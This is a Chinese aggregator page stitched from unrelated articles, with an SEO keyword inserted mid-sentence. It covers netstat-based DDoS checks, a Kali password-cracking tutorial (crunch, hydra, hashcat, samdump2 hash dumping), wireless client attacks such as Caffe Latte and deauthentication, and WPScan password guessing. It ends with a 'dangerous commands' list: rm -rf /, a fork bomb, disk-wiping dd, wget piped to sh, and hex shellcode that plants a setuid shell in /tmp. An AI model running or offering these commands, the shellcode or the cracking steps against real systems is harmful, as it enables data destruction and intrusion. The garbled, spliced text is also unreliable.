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linux渗透攻击命令 msf渗透linux
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如何在Linux上用命令查询是否被DDOS攻击
服务器出现缓慢的状况可能由很多事情导致,比如错误的配置,脚本和差的硬件。但是有时候它可能因为有人对你的服务器用DoS或者DDoS进行洪水攻击。
如何在Linux上使用netstat命令查证DDOS攻击
DoS攻击或者DDoS攻击是试图让机器或者网络资源不可用的攻击。这种攻击的攻击目标网站或者服务通常是托管在高防服务器比如银行,信用卡支付网管,甚至根域名服务器,DOS攻击的实施通常迫使目标重启计算机或者消耗资源,使他们不再提供服务或者妨碍用户,访客访问。
在这篇小文章中,你可以知道在受到攻击之后如何在终端中使用netstat命令检查你的服务器。
一些例子和解释
netstat -na显示所有连接到服务器的活跃的网络连接netstat -an | grep :80 | sort只显示连接到80段口的活跃的网络连接,80是http端口,这对于web服务器非常有用,并且对结果排序.对于你从许多的连接中找出单个发动洪水攻击IP非常有用netstat -n -p|grep SYN_REC | wc -l这个命令对于在服务器上找出活跃的SYNC_REC非常有用,数量应该很低,最好少于5.在dos攻击和邮件炸弹,这个数字可能非常高.然而值通常依赖于系统,所以高的值可能平分给另外的服务器.netstat -n -p | grep SYN_REC | sort -u列出所有包含的IP地址而不仅仅是计数.netstat -n -p | grep SYN_REC | awk '{print $5}' | awk -F: '{print $1}'列出所有不同的IP地址节点发送SYN_REC的连接状态netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n使用netstat命令来计算每个IP地址对服务器的连接数量netstat -anp |grep 'tcp|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n列出使用tcp和udp连接到服务器的数目netstat -ntu | grep ESTAB | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr检查ESTABLISHED连接而不是所有连接,这可以每个ip的连接数netstat -plan|grep :80|awk {'print $5'}|cut -d: -f 1|sort|uniq -c|sort -nk 1显示并且列出连接到80端口IP地址和连接数.80被用来作为HTTP
如何缓解DDoS攻击
当你发现攻击你服务器的IP你可以使用下面的命令来关闭他们的连接:
iptables -A INPUT 1 -s $IPADRESS -j DROP/REJECT
请注意你必须用你使用netstat命令找到的IP数替换$IPADRESS
在完成以上的命令,使用下面的命令杀掉所有httpd连接,清除你的系统,然后重启httpd服务。
killall -KILL httpd service httpd start #For Red Hat systems /etc/init/d/apache2 restar
Linux系统用netstat命令查看DDOS攻击具体命令用法如下:
代码如下:netstat -na
显示所有连接到服务器的活跃的网络连接
代码如下:netstat -an | grep :80 | sort
只显示连接到80段口的活跃的网络连接,80是http端口,这对于web服务器非常有用,并且对结果排序.对于你从许多的连接中找出单个发动洪水攻击IP非常有用
代码如下:netstat -n -p|grep SYN_REC | wc -l
这个命令对于在服务器上找出活跃的SYNC_REC非常有用,数量应该很低,最好少于5.
在dos攻击和邮件炸弹,这个数字可能非常高.然而值通常依赖于系统,所以高的值可能平分给另外的服务器.
代码如下:netstat -n -p | grep SYN_REC | sort -u
列出所有包含的IP地址而不仅仅是计数.
代码如下:netstat -n -p | grep SYN_REC | awk '{print $5}' | awk -F: '{print $1}'
列出所有不同的IP地址节点发送SYN_REC的连接状态
代码如下:netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
使用netstat命令来计算每个IP地址对服务器的连接数量
代码如下:netstat -anp |grep 'tcp|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
列出使用tcp和udp连接到服务器的数目
代码如下:netstat -ntu | grep ESTAB | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr
检查ESTABLISHED连接而不是所有连接,这可以每个ip的连接数
代码如下:netstat -plan|grep :80|awk {'print $5'}|cut -d: -f 1|sort|uniq -c|sort -nk 1
显示并且列出连接到80端口IP地址和连接数.80被用来作为HTTP
如何缓解ddos攻击
当你发现攻击你服务器的IP你可以使用下面的命令来关闭他们的连接:
代码如下:iptables -A INPUT 1 -s $IPADRESS -j DROP/REJECT
请注意你必须用你使用netstat命令找到的IP数替换$IPADRESS
相关问答
Q1: 网络安全干货知识分享 - Kali Linux渗透测试 106 离线密码破解
前言
最近整理了一些 奇安信华为大佬 的课件资料+大厂面试课题,想要的可以私信自取, 无偿赠送 给粉丝朋友~
1. 密码破解简介
1. 思路
目标系统实施了强安全措施
安装了所有补丁
无任何已知漏洞
无应用层漏洞
攻击面最小化
社会 工程学
获取目标系统用户身份
非授权用户不受信,认证用户可以访问守信资源
已知用户账号权限首先,需要提权
不会触发系统报警
2. 身份认证方法
证明你是你声称你是的那个人
你知道什么(账号密码、pin、passphrase)
你有什么(令牌、token、key、证书、密宝、手机)
你是谁(指纹、视网膜、虹膜、掌纹、声纹、面部识别)
以上方法结合使用
基于互联网的身份验证仍以账号密码为主要形式
3. 密码破解方法
人工猜解
垃圾桶工具
被动信息收集
基于字典暴力破解(主流)
键盘空间字符爆破
字典
保存有用户名和密码的文本文件
/usr/share/wordlist
/usr/share/wfuzz/wordlist
/usr/share/seclists
4. 字典
1. 简介
键盘空间字符爆破
全键盘空间字符
部分键盘空间字符(基于规则)
数字、小写字母、大写字符、符号、空格、瑞典字符、高位 ASCII 码
2. crunch 创建密码字典
无重复字符
crunch 1 1 -p 1234567890 | more
1
必须是最后一个参数
最大、最小字符长度失效,但必须存在
与 -s 参数不兼容(-s 指定起始字符串)
crunch 4 4 0123456789 -s 9990
读取文件中每行内容作为基本字符生成字典
crunch 1 1 -q read.txt
1
字典组成规则
crunch 6 6 -t @,%%^^ | more
-t:按位进行生成密码字典
@:小写字母 lalpha
,:大写字母 ualpha
%:数字 numeric
^:符号 symbols
输出文件压缩
root@kali:~# crunch 4 5 -p dog cat bird
1
-z:指定压缩格式
其他压缩格式:gzip、bzip2、lzma
7z压缩比率最大
指定字符集
root@kali:~# crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space -o w.txt -t @d@@ -s cdab
1
随机组合
root@kali:~# crunch 4 5 -p dog cat bird
1
crunch 5 5 abc DEF + !@# -t ,@^%,
在小写字符中使用abc范围,大写字符使用 DEF 范围,数字使用占位符,符号使用!@#
占位符
转义符(空格、符号)
占位符
root@kali:~# crunch 5 5 -t ddd%% -p dog cat bird
1
任何不同于 -p 参数指定的值都是占位符
指定特例
root@kali:~# crunch 5 5 -d 2@ -t @@@%%
1
2@:不超过两个连续相同字符
组合应用
crunch 2 4 0123456789 | aircrack-ng a.cap -e MyESSID -w -
crunch 10 10 12345 –stdout | airolib-ng testdb -import passwd -
3. CUPP 按个人信息生成其专属的密码字典
CUPP:Common User Password Profiler
git clone
python cupp.py -i
4. cewl 通过收集网站信息生成字典
cewl 1.1.1.1 -m 3 -d 3 -e -c -v -w a.txt
-m:最小单词长度
-d:爬网深度
-e:收集包含email地址信息
-c:每个单词出现次数
支持基本、摘要 身份认证
支持代理
5. 用户密码变型
基于 cewl 的结果进行密码变型
末尾增加数字串
字母大小写变化
字母与符号互相转换
字母与数字互相转换
P@$w0rd
6. 使用 John the Ripper 配置文件实现密码动态变型
2. 在线密码破解
1. hydra
简介
密码破解
Windows 密码破解
Linux 密码破解
其他服务密码破解
图形化界面
xhydra
HTTP表单身份认证
密码破解效率
密码复杂度(字典命中率)
带宽、协议、服务器性能、客户端性能
锁定阈值
单位时间最大登陆请求次数
Hydra 的缺点
稳定性差,程序时常崩溃
速度控制不好,容易触发服务屏蔽或锁死机制
每主机新建进程,每服务新建实例
大量目标破解时性能差
2. pw-inspector
Hydra 小工具 pw-inspector
按长度和字符集筛选字典
pw-inspector -i /usr/share/wordlists/nmap.lst -o p1.lst -l
pw-inspector -i /usr/share/wordlists/nmap.lst -o P2.lst -u
pw-inspector -i /usr/share/wordlists/nmap.lst -o P2.lst -u -m 3 -M 5
3. medusa
Medusa 的特点
稳定性好
速度控制得当
基于线程
支持模块少于hydra(不支持RDP)
WEB-Form 支持存在缺陷
查看支持的模块
参数
-n:非默认端口
-s:使用SSL连接
-T:并发主机数
medusa -M ftp -q
3. 离线密码破解
1. 简介
身份认证
禁止明文传输密码
每次认证使用HASH算法加密密码传输(HASH算法加密容易、解密困难)
服务器端用户数据库应加盐加密保存
破解思路
嗅探获取密码HASH
利用漏洞登陆服务器并从用户数据库获取密码HASH
识别HASH类型
长度、字符集
利用离线破解工具碰撞密码HASH
优势
离线不会触发密码锁定机制
不会产生大量登陆失败日志引起管理员注意
2. HASH 识别工具
1. hash-identifier
进行 hash 计算
结果:5f4dcc3b5aa765d61d8327deb882cf99
进行 hash 识别
2. hashid
可能识别错误或无法识别
3. HASH 密码获取
1. samdump2
Windows HASH 获取工具
利用漏洞:Pwdump、fgdump、 mimikatz、wce
物理接触:samdump2
将待攻击主机关机
使用 Kali ISO 在线启动此主机
发现此 windows 机器安装有两块硬盘
mount /dev/sda1 /mnt
将硬盘挂载
cd /mnt/Windows/System32/config
切换目录
samdump2 SYSTEM SAM -o sam.hash
导出密码
利用 nc 传输 HASH
HASH 值:31d6cfe0d16ae931b73c59d7e0c089c0
2. syskey 工具进行密码加密
使用 syskey 进行加密(会对 SAM 数据库进行加密)
重启需要输入密码才能进一步登录
使用 kali iso live
获取到 hash 值
hashcat 很难破解
使用 bkhive 破解
使用 Bootkey 利用RC4算法加密 SAM 数据库
Bootkey 保存于 SYSTEM 文件中
bkhive
从 SYSTEM 文件中提取 bootkey
Kali 2.0 抛弃了 bkhive
编译安装 :
在windows的 kali live 模式下,运行
samdump2 SAM key (版本已更新,不再支持此功能)
建议使用 Kali 1.x
1. Hashcat
简介
开源多线程密码破解工具
支持80多种加密算法破解
基于CPU的计算能力破解
六种模式 (-a 0)
0 Straight:字典破解
1 Combination:将字典中密码进行组合(1 2 11 22 12 21)
2 Toggle case:尝试字典中所有密码的大小写字母组合
3 Brute force:指定字符集(或全部字符集)所有组合
4 Permutation:字典中密码的全部字符置换组合(12 21)
5 Table-lookup:程序为字典中所有密码自动生成掩码
命令
hashcat -b
hashcat -m 100 hash.txt pass.lst
hashcat -m 0 hash.txt -a 3 ?l?l?l?l?l?l?l?l?d?d
结果:hashcat.pot
hashcat -m 100 -a 3 hash -i –increment-min 6 –increment-max 8 ?l?l?l?l?l?l?l?l
掩码动态生成字典
使用
生成文件
计算 hash 类型
结果 MD5
查看 MD5 代表的值
进行破解
2. oclhashcat
简介
号称世界上最快、唯一的基于GPGPU的密码破解软件
免费开源、支持多平台、支持分布式、150+hash算法
硬件支持
虚拟机中无法使用
支持 CUDA 技术的Nvidia显卡
支持 OpenCL 技术的AMD显卡
安装相应的驱动
限制
最大密码长度 55 字符
使用Unicode的最大密码长度 27 字符
关于版本
oclHashcat-plus、oclHashcat-lite 已经合并为 oclhashcat
命令
3. RainbowCrack
简介
基于时间记忆权衡技术生成彩虹表
提前计算密码的HASH值,通过比对HASH值破解密码
计算HASH的速度很慢,修改版支持CUDA GPU
彩虹表
密码明文、HASH值、HASH算法、字符集、明文长度范围
KALI 中包含的 RainbowCrack 工具
rtgen:预计算,生成彩虹表,时的阶段
rtsort:对 rtgen 生成的彩虹表行排序
rcrack:查找彩虹表破解密码
以上命令必须顺序使用
rtgen
LanMan、NTLM、MD2、MD4、MD5、SHA1、SHA256、RIPEMD160
rtgen md5 loweralpha 1 5 0 10000 10000 0
计算彩虹表时间可能很长
下载彩虹表
彩虹表排序
/usr/share/rainbowcrack
rtsort /md5_loweralpha#1-5_0_1000x1000_0.rt
密码破解
r crack *.rt -h 5d41402abc4b2a76b9719d911017c592
rcrack *.rt -l hash.txt
4. John
简介
基于 CPU
支持众多服务应用的加密破解
支持某些对称加密算法破解
模式
Wordlist:基于规则的字典破解
Single crack:默认被首先执行,使用Login/GECOS信息尝试破解
Incremental:所有或指定字符集的暴力破解
External:需要在主配配文件中用C语言子集编程
默认破解模式
Single、wordlist、incremental
主配置文件中指定默认wordlist
破解Linux系统账号密码
破解windows密码
Johnny 图形化界面的john
5. ophcrack
简介
基于彩虹表的LM、NTLM密码破解软件
彩虹表:
Q2: Kali Linux 无线渗透测试入门指南 第六章 攻击客户端
多数渗透测试者似乎把全部注意力都放在 WLAN 设施上,而不会注意无线客户端。但是要注意,黑客也可以通过入侵无线客户端来获得授权网络的访问权。
这一章中,我们将注意力从 WLAN 设施转移到无线客户端。客户端可能是连接的,也可能是独立未连接的。我们会看一看以客户端为目标的几种攻击。
通常,当客户端例如笔记本电脑打开时,它会探测之前连接的网络。这些网络储存在列表中,在基于 Windows 的系统上叫做首选网络列表(PNL)。同时,除了这个列表之外,无线客户端会展示任何范围内的可用网络。
黑客可以执行一个或多个下列事情:
这些攻击都叫做蜜罐攻击,因为黑客的接入点和正常的接入点错误连接。
下个练习中,我们会执行这两种攻击。
遵循这些指南来开始:
我们刚刚使用来自客户端的探针列表来创建蜜罐,并使用和邻近接入点相同的 ESSID。在第一个例子中,客户端在搜索网络的时候,自动连接到了我们。第二个例子中,因为我们离客户端比真正的接入点更近,我们的信号强度就更高,所以客户端连接到了我们。
在上一个练习中,如果客户端不自动连接到我们,我们能做什么呢?我们需要发送解除验证封包来打破正常的客户端到接入点的链接,之后如果我们的信号强度更高,客户端会连接到我们的伪造接入点上。通过将客户端连接到正常接入点,之后强迫它连接蜜罐来尝试它。
在蜜罐攻击中,我们注意到客户端会持续探测它们之前连接到的 SSID。如果客户端已经使用 WEP 连接到接入点,例如 Windows 的操作系统会缓存和储存 WEP 密钥。下一个客户端连接到相同接入点时,Windows 无线配置管理器就会自动使用储存的密钥。
Caffe Latte 攻击由 Vivek 发明,它是这本书的作者之一,并且在 Toorcon 9, San Diego, USA 上演示。Caffe Latte 攻击是一种 WEP 攻击,允许黑客仅仅使用客户端,获取授权网络的 WEP 密钥。这个攻击并不需要客户端距离授权 WEP 非常近。它可以从单独的客户端上破解 WEP 密钥。
在下一个练习中,我们将使用 Caffe Latte 攻击从客户端获取网络的 WEP 密钥。
遵循这些指南来开始:
我们成功从无线客户端获得了 WEP 密钥,不需要任何真实的接入点,或者在附近存在。这就是 Caffe Latte 攻击的力量。
基本上,WEP 接入点不需要验证客户端是否知道 WEP 密钥来获得加密后的流量。在连接在新的网络时,流量的第一部分总是会发送给路由器,它是 ARP 请求来询问 IP。
这个攻击的原理是,使用我们创建的伪造接入点反转和重放由无线客户端发送的 ARP 包。这些位反转的 ARP 请求封包导致了无线客户端发送更多 ARP 响应封包。
位反转接收加密值,并将其自改来创建不同的加密值。这里,我们可以接收加密 ARP 请求并创建高精确度的 ARP 响应。一旦我们发回了有效的 ARP 响应,我们可以一次又一次地重放这个值,来生成我们解密 WEP 密钥所需的流量。
要注意,所有这些封包都是用储存在客户端的 WEP 密钥加密。一旦我们得到了大量的这类封包, aircrack-NG 就能够轻易恢复出 WEP 密钥。
尝试修改 WEP 密钥并且重放攻击。这是个有难度的攻击,并且需要一些练习来成功实施。使用 Wireshark 检验无线网络上的流量是个好主意。
我们已经在之前的章节中看到了接入点上下文中的解除验证攻击,这一章中,我们会在客户端上下文中探索这种攻击。
下一个实验中,我们会发送解除验证封包给客户端并且破坏已经建立的接入点和客户端之间的连接。
遵循这些指南来开始:
我们刚刚看到了如何使用解除验证帧,选项性断开无线客户端到接入点的连接,即使使用了 WEP/WPA/WPA2 加密方式。这仅仅通过发送解除验证封包给接入点来完成 -- 客户端偶对,而不是发送广播解除验证封包给整个网络。
在上一个练习中,我们使用了解除验证攻击来破解连接。尝试使用解除关联访问来破坏客户端和接入点之间的连接。
我们已经看到了如何实施 Caffe Latte 攻击。Hirte 攻击扩展自 Caffe Latte 攻击,使用脆片机制并允许几乎任何封包的使用。
Hirte 攻击的更多信息请见 Aircrack-ng 的官网: http:// 。
我们现在使用 aircrack-ng 来在相同客户端上实施 Hirte 攻击。
遵循这些指南来开始:
我们对 WEP 客户端实施了 Hirte 攻击,客户端是隔离的,并远离授权网络。我们使用和 Caffe Latte 攻击相同的方式来破解密钥。
我们推荐你在客户端上设置不同的 WEP 密钥并多次尝试这个练习来获得自信。你可能会注意你需要多次重新连接客户端来使其生效。
在第四章中,我们看到了如何使用 airecrack-ng 来破解 WPA/WPA2 PSK,基本原理是捕获四次 WPA 握手,之后加载字典攻击。
关键问题是:可不可以仅仅使用客户端来破解 WPA,在没有接入点的情况下?
让我们再看一看 WPA 破解练习:
为了破解 WPA,我们需要来自四次握手的四个参数 -- 验证方的 Nounce,请求方的 Nounce,验证方的 MAC,请求方的 MAC。现在有趣的是,我们不需要握手中的全部四个封包来提取这些信息。我们可以只从封包 1 和 2,或 2 和 3 中提取。
为了破解 WPA-PSK,我们需要启动 WPA-PSK 蜜罐,并且当客户端连接时,只有消息 1 和 2 会发送。由于我们并不知道口令,我们就不能发送消息 3。但是,消息 1 和 2 包含所有密钥破解所需的信息:
我们能够只通过客户端破解 WPA。这是因为,即使只拥有前两个封包,我们也能获得针对握手的字典攻击的全部所需信息。
我们推荐你在客户端设置不同的 WPA 密钥,并且多次尝试这个练习来蝴蝶自信。你会注意到你需要多次重新连接客户端来使其生效。
Q1 Caffe Latte 攻击涉及到哪种加密?
Q2 蜜罐接入点通常使用哪种加密?
Q3 下列哪个攻击是 DoS 攻击?
Q4 Caffe Latte 攻击需要什么?
这一章中,我们了解了甚至是无线客户端也容易受到攻击。这包括蜜罐和其它错误关联攻击。Caffe Latte 攻击用于从无线客户端获得密钥;解除验证和解除关联攻击导致拒绝服务;Hirte 攻击是从漫游客户端获得 WEP 密钥的替代方案;最后,我们仅仅使用客户端破解了 WPA 个人口令。
下一章中,我们会使用目前为止学到的东西,在客户端和设施端实施多种高级无线攻击。所以,赶紧翻过这一页,进入下一章吧!
Q3: Linux 系统如何通过 netstat 命令查看连接数判断攻击
很多时候我们会遇到服务器遭受 cc 或 syn 等攻击,如果发现自己的网站访问异常缓慢且流量异常。可以使用系统内置 netstat 命令 简单判断一下服务器是否被攻击。常用的 netstat 命令
该命令将显示所有活动的网络连接。
查看同时连接到哪个服务器 IP 比较多,cc 攻击用。使用双网卡或多网卡可用。
查看哪些 IP 连接到服务器连接多,可以查看连接异常 IP。
显示所有 80 端口的网络连接并排序。这里的 80 端口是 http 端口,所以可以用来监控 web 服务。如果看到同一个 IP 有大量连接的话就可以判定单点流量攻击了。
这个命令可以查找出当前服务器有多少个活动的 SYNC_REC 连接。正常来说这个值很小,最好小于 5。 当有 Dos 攻击或的时候,这个值相当的高。但是有些并发很高的服务器,这个值确实是很高,因此很高并不能说明一定被攻击。
列出所有连接过的 IP 地址。
列出所有发送 SYN_REC 连接节点的 IP 地址。
使用 netstat 命令计算每个主机连接到本机的连接数。
列出所有连接到本机的 UDP 或者 TCP 连接的 IP 数量。
检查 ESTABLISHED 连接并且列出每个 IP 地址的连接数量。
列出所有连接到本机 80 端口的 IP 地址和其连接数。80 端口一般是用来处理 HTTP 网页请求。
显示连接 80 端口前 10 的 ip,并显示每个 IP 的连接数。这里的 80 端口是 http 端口,所以可以用来监控 web 服务。如果看到同一个 IP 有大量连接的话就可以判定单点流量攻击了。
Q4: 使用 Linux 安全工具进行渗透测试
众多被广泛报道的大型消费企业入侵事件凸显了系统安全管理的重要性。幸运的是,有许多不同的应用程序可以帮助保护计算机系统。其中一个是 Kali,一个为安全和渗透测试而开发的 Linux 发行版。本文演示了如何使用 Kali Linux 来审视你的系统以发现弱点。
Kali 安装了很多工具,它们都是开源的,默认情况下安装了它们会让事情变得更容易。
(LCTT 译注:Kali 及其携带工具只应该用于对自己拥有合法审查权利的系统和设备,任何未经授权的扫描、渗透和攻击均是违法的。本文作者、译者均不承担任何非授权使用的结果。)
本文使用的系统是:
我在上面列出了硬件规格,因为一些任务要求很高,尤其是在运行 WordPress 安全扫描程序(WPScan)时对目标系统 CPU 的要求。
首先,我会在目标系统上进行基本的 Nmap 扫描(你可以阅读 使用 Nmap 结果帮助加固 Linux 系统一文来更深入地了解 Nmap)。Nmap 扫描是一种快速的方法,可以大致了解被测系统中哪些端口和服务是暴露的。
默认扫描显示有几个你可能感兴趣的开放端口。实际上,任何开放端口都可能成为攻击者破坏你网络的一种方式。在本例中,端口 21、22、80 和 443 是不错的扫描对象,因为它们是常用服务的端口。在这个早期阶段,我只是在做侦察工作,尽可能多地获取有关目标系统的信息。
我想用 Nmap 侦察 80 端口,所以我使用 -p 80 参数来查看端口 80, -A 参数来获取操作系统和应用程序版本等信息。
关键信息有:
现在我知道了这是一个 WordPress 服务器,我可以使用 WPScan 来获取有关潜在威胁的信息。一个很好的侦察方法是尝试找到一些用户名,使用 --enumerate u 告诉 WPScan 在 WordPress 实例中查找用户名。例如:
这显示有两个用户: admin 和 pgervase 。我将尝试使用密码字典来猜测 admin 的密码。密码字典是一个包含很多密码的文本文件。我使用的字典大小有 37G,有 3,543,076,137 行。
就像你可以选择不同的文本编辑器、Web 浏览器和其他应用程序 一样,也有很多工具可以启动密码攻击。下面是两个使用 Nmap 和 WPScan 的示例命令:
这个 Nmap 脚本是我使用的许多脚本之一,使用 WPScan 扫描 URL 只是这个工具可以完成的许多任务之一。你可以用你喜欢的那一个。
WPScan 示例在文件末尾显示了密码:
在末尾的“找到有效组合”部分包含了管理员用户名和密码,3231 行只用了两分钟。
我还有另一个字典文件,其中包含 3,238,659,984 行,使用它花费的时间更长并且会留下更多的证据。
使用 Nmap 可以更快地产生结果:
然而,运行这样的扫描可能会在目标系统上留下大量的 HTTPD 日志消息:
为了获得关于在最初的 Nmap 扫描中发现的 HTTPS 服务器的信息,我使用了 sslscan 命令:
它显示了有关启用的 SSL 协议的信息,在最下方,是关于 Heartbleed 漏洞的信息:
有很多方法可以保护你的系统免受大量攻击。几个关键点是:
本文对安全工具及其使用方法的介绍只是冰山一角。深入了解的话,你可能需要查看以下资源:
via:
作者:Peter Gervase选题:lujun9972译者:MjSeven校对:wxy
Q5: Linux中最危险的10个命令
Linux中最危险的10个命令
对于编程人员或或者Linux系统管理员来说linux渗透攻击命令,操作Linux系统最常见的方法就是使用命令行。当然linux渗透攻击命令,Linux命令行佷有用、很高效,但有时候也很危险,尤其是在linux渗透攻击命令你误操作或者不确定你自己在正在做什么的时候。下面我就为大家盘点最危险是10个命令,一起来看看吧!
当然,以下命令通常都是在root权限下才能将愚蠢发挥到无可救药;在普 通用户身份下,破坏的只是自己的一亩三分地。
1. rm -rf 命令
rm -rf命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。下列是一些rm 命令的选项。
rm 命令在Linux下通常用来删除文件。
rm -r 命令递归的删除文件夹,甚至是空的文件夹。(译注linux渗透攻击命令:个人认为此处应该是说错了,从常识看,应该是“甚至是非空的文件夹”)
rm -f 命令能不经过询问直接删除‘只读文件’。(译注linux渗透攻击命令:Linux下删除文件并不在乎该文件是否是只读的,而只是在意其父目录是否有写权限。所以,-f这个参数 只是表示不必一个个删除确认,而是一律悄悄删除。另外,原始的rm命令其实也是没有删除提示的,只是一般的发行版都会将rm通过别名的方式增加-i参数来 要求删除确认,而-f则抑制了这个提示。)
rm -rf / : 强制删除根目录下所有东东。(就是说删除完毕后,什么也没有了。。。)
rm -rf *: 强制删除当前目录的所有文件。
rm -rf . : 强制删除当前文件夹及其子文件夹。
从 现在起,当你要执行rm -rf命令时请留心一点。我们可以在“.bashrc”文件对‘rm‘命令创建rm -i的别名,来预防用 ‘rm‘命令删除文件时的事故,它会要求你确认每一个删除请求。(译注:大多数发行版已经这样做了,如果还没有,请这样做,并在使用-f参数前一定考虑好 你在做什么!译者本人有着血泪的教训啊。)
2. :(){:|:};: 命令
这就是个fork 炸弹的实例。具体操作是通过定义一个名为 ‘:‘的函数,它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。
:(){:|:};:
哦?你确认你要试试么?千万别在公司正式的服务器上实验啊~~
3. 命令 /dev/sda
上列命令会将某个‘命令‘的输出写到块设备/dev/sda中。该操作会将在块设备中的所有数据块替换为命令写入的原始数据,从而导致整个块设备的数据丢失。
4. mv 文件夹 /dev/null
这 个命令会移动某个‘文件夹‘到/dev/null。在Linux中 /dev/null 或 null 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。(译注:这就是黑洞啊。当然,要说明的是,通过将文件夹移动到黑洞,并不能阻止 数据恢复软件的救赎,所以,真正的`彻底毁灭,需要采用专用的软件或者手法来完成——我知道你肯定有些东西想删除得干干净净的。)
# mv /home/user/* /dev/null
上列命令会将User目录所有内容移动到/dev/null,这意味着所有东西都被‘卷入’黑洞 (null)之中。
5. wget -O- | sh
上列命令会从一个(也许是)恶意源下载一个脚本并执行。Wget命令会下载这个脚本,而sh会(无条件的)执行下载下来的脚本。
注意: 你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。(译注:所以,你真的知道你在做什么吗?当遇到这种需要是,我的做法是,先wget下来,然后我去读一读其中到底写了些什么,然后考虑是否执行。)
6. mkfs.ext3 /dev/sda
上列命令会格式化块设备‘sda’,你无疑知道在执行上列命令后你的块设备(硬盘驱 动器)会被格式化,崭新的!没有任何数据,直接让你的系统达到不可恢复的阶段。(译注:通常不会直接使用/dev/sda这样的设备,除非是作为raw设 备使用,一般都需要将sda分成类似sda1、sda2这样的分区后才使用。当然,无论你使用sda还是sda1,这样对块设备或分区进行mkfs都是毁 灭性的,上面的数据都会被蒸发了。)
7. file
上列命令常用来清空文件内容(译注:通常也用于记录命令输出。 不过请在执行前,确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。另外,我想你可能真正想用的是 “”,即累加新的输出到文件,而不是刷新那个文件。)。如果用上列执行时输入错误或无知的输入类似 “xt.conf” 的命令会覆盖配置文件或其他任何的系统配置文件。
8. ^foo^bar
这个命令在“鲜为人知而又实用的 Linux 命令大全:”中描述过,用来编辑先前运行的命令而无需重打整个命令。但当用foobar命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦。(译注:事实上,这种小技巧是译者认为的,少数史前时代遗留下来的无用而有害的“黑客”技巧。)
9. dd if=/dev/random of=/dev/sda
上列命令会向块设备sda写入随机的垃圾文件从而擦出数据。当然!你的系统可能陷入混乱和不可恢复的状态。(译注:记得上面说过mv到黑洞并不能彻底删除数据么?那么这个命令就是给了你一个彻底删除的方法!当然为了保险起见,你可以覆写多次。)
10. 隐藏命令
下面的命令其实就是上面第一个命令 (rm -rf)。这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你的根分区。
这个命令表明通常真正的危险是隐藏的,不会被轻易的检测到。你必须时刻留心你在做什么结果会怎样。不要编译/运行从未知来源的代码。
char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;
注意: 不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令,因为这将导致数据丢失或者系统崩溃。如果你想测试它们,请在虚拟机上运行。
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